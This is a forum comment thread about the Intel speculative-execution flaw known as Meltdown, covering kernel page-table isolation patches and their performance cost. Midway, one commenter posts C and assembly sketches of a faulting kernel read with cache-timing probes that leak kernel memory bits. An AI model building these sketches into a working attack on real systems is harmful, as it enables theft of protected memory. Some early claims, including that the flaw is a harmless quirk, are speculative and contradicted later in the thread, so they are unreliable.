A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
Programmers are scrambling to overhaul the open-source Linux kernel’s virtual memory system. Meanwhile, Microsoft is expected to publicly introduce the necessary changes to its Windows operating system in an upcoming Patch Tuesday: these changes were seeded to beta testers running fast-ring Windows Insider builds in November and December.
Crucially, these updates to both Linux and Windows will incur a performance hit on Intel products. The effects are still being benchmarked; however, we’re looking at a ballpark figure of a five to 30 per cent slowdown, depending on the task and the processor model. More recent Intel chips have features – such as PCID – to reduce the performance hit.
That’s one hell of a bug.
From the article, quoting a developer:
“There is presently an embargoed security bug impacting apparently all contemporary [Intel] CPU architectures that implement virtual memory…”
Maybe this is lost in translation, but I understood the 286 to have introduced virtual memory, so this presumably affects every Intel CPU made since the early 1980s? Yikes
AMD made an LKML post about this, explaining in more detail what sort of bug this is and that they’re not vulnerable.
If I understand it correctly (big if), the problem is in the way Intel CPUs do speculative execution. Apparently, the speculative branches don’t fully respect memory protection, and someone has found a way to turn that into real-world effects. It seems to have been surprising that this was possible.
LKML link: https://lkml.org/lkml/2017/12/27/2
Was just about to edit, yes; so just every Intel x86 from the Pentium Pro onwards, not so bad.
Contemporary CPUs, though, and it’s implied that it’s related to speculative execution (in the old definition where it meant branch prediction and executing ahead of a stall).
That means 286, 386, and 486 cannot be affected, as they don’t have branch prediction – they just stall on branches where the available data isn’t present.
P5 Pentium and Bonnell Atom could be affected, but, being in-order designs, are less likely to be affected even if the bug is present; they can’t get as far.
And, the major changes to the memory model, AFAIK, were 286 (added segmented MMU), 386 (32-bit MMU with flat addressing), P6 (PAE, extending the MMU to 36-bit physical addresses), Dothan (NX), Prescott (hackish 40-bit EM64T implementation), and Core 2 (full 48-bit, IIRC, EM64T implementation).
Here are my guesses as to where the bug would likely have been introduced:
* P6 (Pentium Pro) – if that’s the case, Pentium 4 and all Atoms/Atom-derived CPUs are likely unaffected, as they were separate clean-sheet redesigns (although elements were exchanged between designs)
* Dothan Pentium M – if that’s the case, Prescott Pentium 4s are possibly unaffected, Atoms/Atom-derived CPUs are likely unaffected, pre-Prescott Pentium 4s are almost certainly unaffected
* Prescott Pentium 4 – if that’s the case, then everything with NX support or everything with AMD64 support is likely affected (if only some old P4s were affected it wouldn’t be a big deal, after all; this scenario would imply that some MMU design was reused from the P4 in later CPUs)
* Core 2 – if that’s the case, then Atoms/Atom-derived CPUs are likely unaffected
* Something later – same deal about Atoms/Atom-derived CPUs likely being unaffected.
Phoronix already has some benchmarks for this on Linux: https://www.phoronix.com/scan.php?page=article&item=linux-415-x86pti…
Hi,
The minor timing quirk in Intel CPUs (which does not break documented behaviour, expected behaviour, or any guarantee, and therefore can NOT be considered a bug in the CPU) allows an attacker to determine which areas of kernel space are used and which aren’t.
It does not allow an attacker to read or modify the contents of any memory used by the kernel, doesn’t even tell the attacker what the areas of kernel space are being used for, and by itself is not a security problem at all. It only means that if there are massive security holes somewhere else, those massive security holes might or might not be a little bit easier to exploit. In other words, the main effect is that it makes “kernel address space randomisation” even less effective at providing “security through obscurity” than it previously was.
Note that the insane hackery to avoid this non-issue adds significant overhead to kernel system calls; ironically, making the performance of monolithic kernels worse than the performance of micro-kernels (while still providing inferior security to micro-kernels). The insane hackery doesn’t entirely fix the “problem” either: a small part of the kernel must remain mapped, and an attacker can still find out where in kernel space that small part of the kernel is and use this information to infer where the rest of the kernel is.
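For what it’s worth, that syscall overhead is easy to measure on your own machine, before and after the patch: just time a cheap system call in a tight loop. A rough sketch in C (the loop count is arbitrary, and the numbers vary wildly by CPU and kernel):

    #include <stdio.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/syscall.h>

    int main(void) {
        enum { N = 1000000 };     /* arbitrary loop count */
        struct timespec t0, t1;

        clock_gettime(CLOCK_MONOTONIC, &t0);
        for (int i = 0; i < N; i++)
            syscall(SYS_getpid);  /* force a real kernel round trip */
        clock_gettime(CLOCK_MONOTONIC, &t1);

        long ns = (t1.tv_sec - t0.tv_sec) * 1000000000L
                + (t1.tv_nsec - t0.tv_nsec);
        printf("%.1f ns per system call\n", (double)ns / N);
        return 0;
    }

Run it on a patched and an unpatched kernel, and the difference is roughly the per-syscall cost of the page table switching.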
Fortunately the “malicious performance degradation attack” (the ineffective work-around for the non-issue) is easy for end users to disable.
– Brendan
In any case, would that be exploitable via JavaScript? If not, I don’t care at all. Anything else I run, I already run deliberately on my machine, and it can access all my files anyway. And that is what matters to me: my files. Root cannot do more damage to me than a user process.
Hi,
If you have poorly designed hardware (e.g. hardware that is susceptible to “rowhammer”) and a poorly designed kernel (e.g. a monolithic kernel where there’s a strong relationship between virtual addresses used by the kernel and physical addresses), then in theory this minor timing quirk can make it a little easier for an attacker to exploit huge gaping security holes that should never have existed.
JavaScript probably can’t use the minor timing quirk (the quirk relies on a strict access pattern involving the use of a “dodgy pointer” that will cause a page fault, and JavaScript is designed not to support pointers or raw addresses); so an attacker using JavaScript will exploit the gaping security holes without using the minor timing quirk.
– Brendan
Brendan,
The problem is that there’s very little published info on this newest attack. The little that is around suggests to me this is much more significant than merely broken ASLR. It sounds like Intel’s out-of-order speculative execution may be running code prior to checking the full credentials, in such a way that someone found a way to exploit the deferment; this does not happen on AMD processors. Apparently the temporary software fix is to reload the page tables on every kernel invocation. This flushes the TLBs, and happens to fix the ASLR leak as well, but I think fixing ASLR was just a side effect – there’s not enough information to know for sure. I could be completely wrong, but this media hush would make very little sense if they had merely broken ASLR again, given that ASLR has already been publicly cracked for ages. I believe the sense of urgency, the deployment of high-cost workarounds in macOS, Windows, and Linux, and the planned service outages at Amazon strongly suggest something much more critical was found that directly compromises kernel security on Intel processors.
Hopefully Thom will post an update when all is finally revealed.
Hi,
As I understand it:
a) Program tries to do a read from an address in kernel space
b) CPU speculatively executes the read and tags the read as “will generate page fault” (so that a page fault will occur at retirement), but also (without regard to permission checks, and likely in parallel with them) either speculatively reads the data into a temporary register (if the page is present) or pretends the data being read will be zero (if the page is not present), for performance reasons (so that other instructions can be speculatively executed after a read). Note that the data (if any) in the temporary register cannot be accessed directly (it won’t become “architecturally visible” when the instruction retires).
c) Program does a read from an address that depends on the temporary register set by the first read, which is also speculatively executed, and because it’s speculatively executed it uses the “speculatively assumed” value in the temporary register. This causes a cache line to be fetched for performance reasons (to avoid a full cache miss penalty if the speculatively executed instruction is committed and not discarded).
d) Program “eats” the page fault (caused by step a) somehow so that it can continue (e.g. signal handler).
e) Program detects if the cache line corresponding to “temporary register was zero” was pre-fetched (at step c) by measuring the amount of time a read from this cache line takes (a cache hit or cache miss).
In this way (or at least, something vaguely like it); the program determines if a virtual address in kernel space corresponds to a “present” page or a “not present” page (without any clue what the page contains or why it’s present or if the page is read-only or read/write or executable or even if the page is free/unused space on the kernel heap).
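To make steps d) and e) concrete, here’s a minimal sketch in C. This is only an illustration of the shape of such a probe, not the actual exploit: the kernel address is a made-up example, HIT_THRESHOLD is a number you’d have to calibrate per machine, and on a CPU or kernel that isn’t vulnerable it simply reports a miss:

    #include <stdio.h>
    #include <stdint.h>
    #include <signal.h>
    #include <setjmp.h>
    #include <x86intrin.h>        /* _mm_clflush, _mm_lfence, __rdtscp */

    #define HIT_THRESHOLD 80      /* cycles; made-up value, calibrate per CPU */

    static uint8_t probe[64];     /* one probe cache line */
    static sigjmp_buf recover;

    /* Step (d): "eat" the page fault so the program can continue. */
    static void on_segv(int sig) { (void)sig; siglongjmp(recover, 1); }

    /* Step (e): time one load; a cache hit is much faster than a miss. */
    static uint64_t time_load(volatile uint8_t *p) {
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }

    int main(void) {
        /* Made-up kernel-space address, purely for illustration. */
        volatile uint8_t *kaddr = (volatile uint8_t *)0xffffffff81000000ULL;

        signal(SIGSEGV, on_segv);
        _mm_clflush(probe);       /* make sure the probe line starts cold */
        _mm_lfence();

        if (sigsetjmp(recover, 1) == 0) {
            /* Steps (a)-(c): this read faults architecturally; the question
               is whether the dependent probe load below is still issued
               speculatively, dragging the probe line into the cache.      */
            (void)*(volatile uint8_t *)&probe[*kaddr & 1];
        }

        uint64_t t = time_load(probe);
        printf("probe load: %llu cycles (%s)\n", (unsigned long long)t,
               t < HIT_THRESHOLD ? "cache hit" : "cache miss");
        return 0;
    }

The interesting part lives entirely in whether the CPU issues the dependent probe load before the faulting read retires.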
– Brendan
There has to be more to it than that. I mean I’m not saying your analysis is wrong, but it has to be incomplete. Someone has either demonstrated a reliable attack using this exploit to compromise and/or crash affected systems from low privilege user space code, or there is more to it than there appears to be.
No way would everyone issue fixes like this in such a cloak and dagger fashion, especially a fix that causes a significant performance regression, if it wasn’t scaring the crap out of some people…
Hi,
You’re right – there’s something I’ve overlooked.
For a sequence like “movzx edi,byte [kernelAddress]” then “mov rax,[buffer+edi*8]”, if the page is present, the attacker could find out which cache line (in their buffer) got fetched and use that to determine 5 bits of the byte at “kernelAddress”.
With 3 more individual attempts at progressively larger strides (e.g. “mov rax,[buffer+edi*16]”, “mov rax,[buffer+edi*32]” and “mov rax,[buffer+edi*64]”, each doubling of the stride resolving one more bit) the attacker could determine the other 3 bits and end up knowing the whole byte.
Note: It’s not that easy – with a single CPU the kernel’s page fault handler would pollute the caches a little (and could deliberately invalidate or completely pollute caches as a defence) before you can measure which cache line was fetched. To prevent that the attacker would probably want/need to use 2 CPUs that share caches (and some fairly tight synchronisation between the CPUs so the timing isn’t thrown off too much).
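The measurement half of that is straightforward to sketch. Again, this is only my illustration, assuming the “buffer+edi*8” layout above: 256 possible byte values at an 8-byte stride span 32 cache lines, so the hottest line yields the top 5 bits:

    #include <stdio.h>
    #include <stdint.h>
    #include <x86intrin.h>        /* _mm_clflush, _mm_lfence, __rdtscp */

    #define LINE  64
    #define LINES 32              /* 256 values * 8-byte stride / 64B lines */

    static uint8_t buffer[LINES * LINE];

    static uint64_t time_load(volatile uint8_t *p) {
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }

    int main(void) {
        /* Flush the whole probe buffer before the speculative access. */
        for (int i = 0; i < LINES; i++) _mm_clflush(&buffer[i * LINE]);
        _mm_lfence();

        /* Stand-in for the speculative "mov rax,[buffer+edi*8]": pretend
           the secret byte was 0xA7, which lands in line 0xA7 >> 3 = 20. */
        (void)*(volatile uint8_t *)&buffer[0xA7 * 8];
        _mm_lfence();

        /* Scan for the hottest line; a real probe would scan the lines in
           a shuffled order so the hardware prefetcher can't skew things. */
        int best = -1;
        uint64_t best_t = UINT64_MAX;
        for (int i = 0; i < LINES; i++) {
            uint64_t t = time_load(&buffer[i * LINE]);
            if (t < best_t) { best_t = t; best = i; }
        }
        printf("hottest line %d -> top 5 bits = 0x%02x\n", best, best << 3);
        return 0;
    }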
– Brendan
Brendan,
Bear in mind this is just a very rough idea, but the theory is that if the branch predictor speculatively follows the branch, then the page corresponding to the hidden kernel value should get loaded into the cache. The access will inevitably trigger a fault, which is expected, but the state of the cache will not get reverted and will therefore leak information about the value in kernel memory. Scanning the dummy memory under clock analysis should reveal which pages are in the cache. Different variations of this idea could provide more information.
Would it be possible to slow down page fault notifications? For example, if the page fault was not in kernel space, halt the application for the length of time a kernel read would have taken. That way, all segfaults would be reported after the same delay.
Are there any sane apps that depend on timely segfault handling and thus would be affected by such a workaround?
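For illustration, padding a code path to a fixed deadline (which is roughly what’s being proposed here, only kernel-side) could look like this in userspace. A rough sketch; PAD_NS is an arbitrary figure:

    #include <stdio.h>
    #include <time.h>

    #define PAD_NS 50000L         /* arbitrary fixed budget for the fault path */

    /* Sleep until start + PAD_NS, so every caller observes the same
       latency no matter how long the real handling actually took.   */
    static void pad_to_deadline(const struct timespec *start) {
        struct timespec deadline = *start;
        deadline.tv_nsec += PAD_NS;
        if (deadline.tv_nsec >= 1000000000L) {
            deadline.tv_sec  += 1;
            deadline.tv_nsec -= 1000000000L;
        }
        clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &deadline, NULL);
    }

    int main(void) {
        struct timespec start, end;
        clock_gettime(CLOCK_MONOTONIC, &start);
        /* ... variable-time work (the fault handling) would go here ... */
        pad_to_deadline(&start);
        clock_gettime(CLOCK_MONOTONIC, &end);
        printf("observed: %ld ns\n",
               (end.tv_sec - start.tv_sec) * 1000000000L +
               (end.tv_nsec - start.tv_nsec));
        return 0;
    }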
Please do not claim this is bogus. Microkernels fixed against this defect will in fact take a higher hit than a monolithic kernel. Kernel-to-usermode switching cost increases when you have to swap complete page tables every single time you change from kernel space to userspace and back, and microkernels make that transition far more often than monolithic kernels do. That is the advantage of running drivers in kernel space.
This is not exactly a non-issue. The fact that the userspace ring was able to detect kernel-space pages was found in 2016. Now kernel-space pages with the wrong protection bits, for whatever reason, are also exposed due to that fault.
A small fragment of the kernel mapped into userspace does not provide enough information to work out the randomisation. The complete kernel mapped into userspace, as Intel CPUs have effectively been providing, downright does.
A small fragment mapped into userspace on independent page tables also does not imply any relationship to that information once you enter kernel mode and switch to the kernel-mode page tables and TLB entries.
Also, this mapping fix to work around the Intel MMU/CPU design issue in fact hurts worst when applied to a microkernel. In some ways it explains why AMD CPUs have been slightly slower in particular benchmarks.
Yes, with the AMD MMU/CPU, if you attempt to access ring 0 pages from rings 1-3 and they have not been mapped for you, it’s not happening. Same with ring 1 pages from rings 2 and 3.
So that KASLR attack from 2016 did not work on AMD CPUs, and finding extra protection flaws also has no effect on AMD CPUs, because the 2016 KASLR attack does not work there. It’s not that AMD has different timing; it has better page-access rules enforced by hardware, so most of the kernel’s ring 0 pages are basically non-existent to userspace code.
Really, this is another reason why in the past the US military required anything it acquired to come from three vendors using compatible sockets, so a vendor glitch like this could be fixed by changing chips.
There is security by obscurity, and there is “not being there”. Not being there is better. The AMD CPU/MMU does “not being there”, so userspace cannot see the kernel-space ring 0 pages at all, and this makes solving the kernel’s address randomisation next to impossible.
Intel was depending on the obscurity of no one hunting through memory and finding out that the complete set of kernel-space and userspace pages was in fact exposed to userspace programs. Then Intel prayed that memory protection settings would always be enforced and correct. A few cases turned up in 2017 where the memory protections were not always on. So now you have kernel pages exposed to userspace, and userspace able to write to them; what can you call that but a mega failure?
Implementing two page tables, one for kernel space and one for userspace, is about the only valid way to work around Intel’s goof-up. Please note this kind of fault dates back to the 286. All the AMD processors with a built-in MMU have behaved differently, preventing the problem.
Hi,
Intel wasn’t depending on obscurity – they didn’t invent or implement “kernel address space randomisation”. This probably came from one of the “hardened Linux” groups (SELinux? Grsecurity?) before being adopted in “mainline Linux” (and cloned by Microsoft).
As far as I know this problem *might* affect Pentium III and newer (and might only affect Broadwell and newer – details are hard to find). It does not affect the 80286, 80386, 80486 or Pentium. The 80286 doesn’t even support paging (and doesn’t do speculative execution either).
Don’t forget that recent ARM CPUs are also affected – it’s not just “Intel’s goof-up” (this time).
– Brendan
So it finally proves Andrew S. Tanenbaum was right all along: Minix was a superior OS from the very beginning, with a clever architecture.
Btw, was it the discovery last October that Minix was being used as a hypervisor (and the subsequent PoCs/hacks) that led to the flaw being found in Intel CPUs?
Would a similar flaw be found in AMD chips if they also used Minix to perform similar tricks? What about ARM chips and their “TrustZone”?
No. Let me put it like this: microkernels already take a similar hit, as their context switches are from user to user; now macrokernels get a similar hit by having to dump the virtual memory tables before going to user mode, just like each user’s tables are dropped when moving to another user.
Carewolf,
Indeed, this workaround will make a macrokernel perform like a “naive” microkernel, which could be potentially worse than a microkernel that’s undergone design efforts to mitigate the userspace transition overhead (like vectored IO and memory mapped IPC, etc).
Intel will hopefully fix the flaw (whatever it is) in future CPUs, but realistically new chips could end up being cost-prohibitive for many consumers, who typically run multiple generations behind Intel’s latest architectures even after purchasing new computers, since most of us cannot afford several hundred dollars for Intel’s latest CPU offerings. So unless Intel gives some kind of credit to replace faulty CPUs previously sold and in inventory, many consumers are going to be negatively impacted for the medium to long term.
Edit:
It’s too early to know what’s going on, but assuming one’s workloads aren’t terribly affected by this workaround, it could potentially be good news for people wanting to buy the faulty systems at a discounted price. For example, this could instantly render tons of enterprise equipment completely worthless to its original owners. It may no longer be good enough for them, but it might be good for a home lab.
There’s already an exploit in the wild using this to read kernel memory as a non-root user. All it takes is a bit of JavaScript downloading and executing such a binary and you’re pwned.
https://twitter.com/brainsmoke/status/948561799875502080
Damn. This should be great for AMD. I just hope it can be disabled in Microsoft’s case. No one needs to take 30% less performance on an offline machine.
raom,
However, at least as of right now, the current mainline kernel (4.15-rc6) does not include it, meaning that AMD users will be punished as well if they use that kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/d…
BTW if you want to browse the changes applied to the kernel source code in order to support this, here’s a handy link. All references to “PTI” functions and/or files are referring to this change.
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/d…
I didn’t see anyone mention it, but there will be an ecological price to pay for this bug.
At work we have about 100 big servers crunching data for a network operator, and that is for just one customer. A 20% hit means we will have to buy extra servers to compensate, as we cannot afford to lose data.
This will cost not just money and deployment work time, but 20% extra power usage from now on…
Since I’m assuming you’re using fairly modern CPUs that support the ‘PCID’ feature, which minimizes the performance impact of the fix (~5%), it shouldn’t be too drastic.
Obviously, if you’re at the edge of the performance cliff already, you’ll be affected, but if you’re riding the edge, you’re already screwed and should be in the process of buying more hardware.
Or perhaps you should make a pitch for ThreadRipper / Epyc based systems.
Which CPUs have PCID? I googled; was it introduced with Westmere, or was it later?
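You can check a given box yourself: PCID is reported in CPUID leaf 1, ECX bit 17, and the INVPCID instruction that the kernel patches can also take advantage of is leaf 7, EBX bit 10. A quick sketch using GCC/Clang’s cpuid.h:

    #include <stdio.h>
    #include <cpuid.h>            /* GCC/Clang builtin CPUID helpers */

    int main(void) {
        unsigned int eax, ebx, ecx, edx;

        if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx)) {
            puts("CPUID leaf 1 not supported");
            return 1;
        }
        /* CPUID.01H:ECX bit 17 = PCID (process-context identifiers) */
        printf("PCID:    %s\n", (ecx & (1u << 17)) ? "yes" : "no");

        /* CPUID.(EAX=07H,ECX=0):EBX bit 10 = INVPCID */
        if (__get_cpuid_max(0, NULL) >= 7) {
            __cpuid_count(7, 0, eax, ebx, ecx, edx);
            printf("INVPCID: %s\n", (ebx & (1u << 10)) ? "yes" : "no");
        }
        return 0;
    }

On Linux, “grep pcid /proc/cpuinfo” shows the same flag.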
https://www.fool.com/investing/2017/12/19/intels-ceo-just-sold-a-lot…
On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.
So why kernel patches and not microcode? I’m assuming it’s just a short-term solution and there will be a better long-term solution.
kwan_e,
There’s only so much you can do in microcode to alter the behavior of some opcodes; features like branch prediction are still hardwired and require new silicon designs. My understanding is that the engineers tried to avoid this and that it was a last resort, but they found no other solution.
That is surprising to me. I’d have thought you’d want to make something like branch prediction modifiable (well, just like other instructions/features) so fixes can be applied.
So my question is, why is the lack of security check hardwired, or why it was designed in such a way that not even a microcode update could fix it?
Well, a CPU is not an FPGA; the whole logic is not reprogrammable. Microcode allows you to modify/patch the ISA, but the main ‘engine’ (composed of the ALU, the execution units, …) has to be hardwired somehow.
Good explanation here: http://dsearls.org/courses/C391OrgSys/CPU/CPU.htm
I would hardly call speculative execution part of the main engine, since processors can get along fine without it. I would have thought speculative execution would be one of the killer features of modern microcode-based designs.
AMD, at least, claims not to have this security hole hardwired into their processors, so it’s clearly possible to avoid baking this stuff into the silicon in a way that’s unfixable.
Well, CPU architecture is private IP, the special recipe, the salt and pepper that a company like Intel, AMD or ARM (to name a few) promotes as unique and groundbreaking and tremendous and butterflies, to put the competition to shame.
But not only that; it’s also tricky engineering to get the job done a little better, faster, and more frugally than the competition. These (speculative) execution units are engraved in stone (well, etched in silicon) and are not subject to change until the next architecture iteration.
Just like a motor engine: the basic principle remains the same, but that doesn’t prevent modifications and improvements. Yet if the problem is the particle exhaust of combustion engines, which is common to them all, the whole industry is doomed.
kwan_e,
Given that AMD’s x86 implementation is different from Intel’s, there’s no reason a hardware flaw in one must be present in the other. Unfortunately, it looks like we’ll have to wait until next week at the earliest before we get more details… grr.
But even if the execution units were in microcode, what final unit would do the interpreting at the very end of the chain? There must be spinning gears somewhere getting the job done.
But… the Transmeta Crusoe was (factory) upgradable?
Kochise,
I don’t know much about it.
I was only wondering about the speculative execution aspect, where something like (the lack of) security checks could have been implemented in software. Of course some pipelines need to be hardwired for performance reasons.
———–
Either way, it seems like a strange design decision overall to not honour security checks by default. No safe language can protect against that.
kwan_e,
If it’s a check that has to happen on every single memory request, then the overhead of solving it with code rather than wires might not be justified.
I’m sure they’ve got thousands of test cases scanning for recurrences of things like the FDIV bug and whatnot; it would seem that nobody at Intel came up with a test case for this flaw before now, so it slipped through the cracks. However, without knowing what “it” is, we don’t know how egregious their failure was.
I was going to mention that macOS is affected as well; it isn’t just a Windows and Linux issue as the article here states.
Apparently some people on this site don’t like it when you ask an earnest question because you don’t know something.
Sorry, next time I’ll pretend to know everything.
You asked a question, I (we) replied; why are you getting angry?
First of all, how do you know I am angry?
Second, it isn’t the replies to my question that I was referring to. Given that you couldn’t see even that, refer to the first point.
I’d say your sarcastic tone is revealing of your true self. Now pretend whatever you want to feel right.
Now I’m sarcastic.
How about this? I can write anything in any tone, and you’ll just read whatever emotion you want into it regardless of the truth.
Never once does it enter your mind that there are also cultural differences, that tone may actually come across differently, and that you’re not an expert in all cultures.
Come on, don’t hide behind a supposed cultural difference. I can actually detect earned up/down votes more easily than you think, and there is an obvious bias from your groupies here.
Now pretend what you like; I’ve already made up my mind about it.
Sounds like Intel has some solution, and I assume it’s via microcode.
https://newsroom.intel.com/news-releases/intel-issues-updates-protec…
whartung,
Taken at face value, though, it seems many consumers won’t be covered, because many desktop computers are sold with older CPUs. My newest computer (an i7-3770) that I bought two years ago is already outside their specified support window.
While I sit here reading this, I have apt updating the software on my laptop, which is promptly burning a hole in my lap as the CPU spins: the company-mandated virus scanner scans each and every updated file, making my laptop less responsive at the same time.
Seems we’re all too happy to pay a significant price for security, so it’ll be business as usual within 3 months once the furore has died down.
Yeah, it looks like everyone is making a big fuss and moaning about a possible CPU slowdown while we already stuff our overpowered computers with Flash animations and real-time virus scanners. Would we have noticed if we hadn’t been told?
We just bumped our DB box from 8 to 10 CPUs, like two weeks ago, as we were running higher and higher overall CPU loads.
This patch will effectively negate those CPUs and now we’ll probably have to allocate 2 more just to compensate and get us back to where we were.
However, because of our reliability and failover requirements, we also need to allocate more CPUs to the back up machines as well. Due to our need to ensure that our Staging and Production systems are equal for testing and rollout issues, we also have to upgrade our Staging infrastructure (which also has a hot spare machine).
So, this bug is going to “cost” us 8 more CPUs. We had to scavenge under-used VMs to reclaim them in order to free up those CPUs for our upgrade. I honestly don’t know if we have 8 CPUs to spare.
Thankfully, we won’t need to do this to the rest of the infrastructure, as the CPU load isn’t as much of a problem there, but we’re certainly excited that everything (notably response times) is just going to be 10-20% slower across the board. Yay us.
So, yea, this is a big deal for us.
It comes down to use case I guess. There are folks on OSAlert (and the internet as a whole) who run 1000+ build farms at work, there are some who tinker as hobbyists and some who probably only use x86 when absolutely necessary.
It’s gonna impact different people in different ways (if at all). Some folks are thinking about their brand new gaming rig, others about their company’s 8-figure cloud operations.
That’s why I love this site, it’s a whole mix of backgrounds.
The impact of the security fix varies depending on what your workload is.
Gaming, which all runs in user space rather than kernel space, seems largely unaffected.
Similarly, I would question whether a well tuned DB would be heavily affected, since it’s largely IO bound as a rule, rather than heavy kernel CPU.
Best plan is to start preparing for increased CPU counts, but wait to verify it’s a problem first.
… or buy AMD.
Well, there’s more to consider. In scientific circles it’s quite common to also include runtime results for algorithms, specifying the CPU used along with some relevant details; however, listing the kernel version is not generally done. It seems there’ll be a need to do that too from now on. It would be quite some “fun” (not) to keep unpatched kernels around just to run comparable tests against the published numbers of earlier works.
It is presumed that hobby and alternate operating systems will also be impacted.
There has been some discussion about the issue in Haiku’s forums. However, there was no mention of the issue at this time for MenuetOS, ReactOS, and SyllableOS (no longer active?).
There are probably many lesser-known operating systems which may potentially be impacted. It will take some time to sort out the legacy of this security flaw.
Well, obviously the onus is on the OS authors to take the proper steps for mitigation, but at the same time, they may well take into account the simple odds of attack.
When I saw the potential performance impact on our dedicated DB server, I gave serious consideration to not wanting the patch. The argument is simply that if someone managed to get a process running on our DB machine (which is necessary to exploit this in the first place), we have far graver issues from much simpler paths of exposure than this thing.
The real threat of this thing, to me, is the public clouds, which, without mitigation, are patently unsafe now. But our current deployment model doesn’t leverage public infrastructure.
I will most likely be overruled by corporate in the end, however.
Just wondering whether UEFI is potentially impacted by this flaw, notably with respect to the insertion of a rootkit?
Indirectly, how about the Intel Management Engine, which has been running Minix at “Ring -3”?
BlueofRainbow,
Other bugs aside, this core isn’t normally accessible to users. Even if they could access it, I don’t think these simple low-performance cores have speculative branching to begin with.
https://en.wikipedia.org/wiki/Intel_Quark
Intel’s System Management Mode (SMM) is a different matter, though; it runs at a higher privilege level than an OS kernel. It’s normally used by the BIOS for mundane tasks. In theory it might contain code patterns that are vulnerable to timing attacks. In practice I’m not sure the conditions required for an attack are met. I guess we’d have to reverse engineer the BIOS code responsible for communicating with SMM to see if one could exploit that channel.
SMM has already been hacked in the past, although cache timing attacks could make for new kinds of exploits.
https://www.computerworld.com/article/2531246/malware-vulnerabilitie…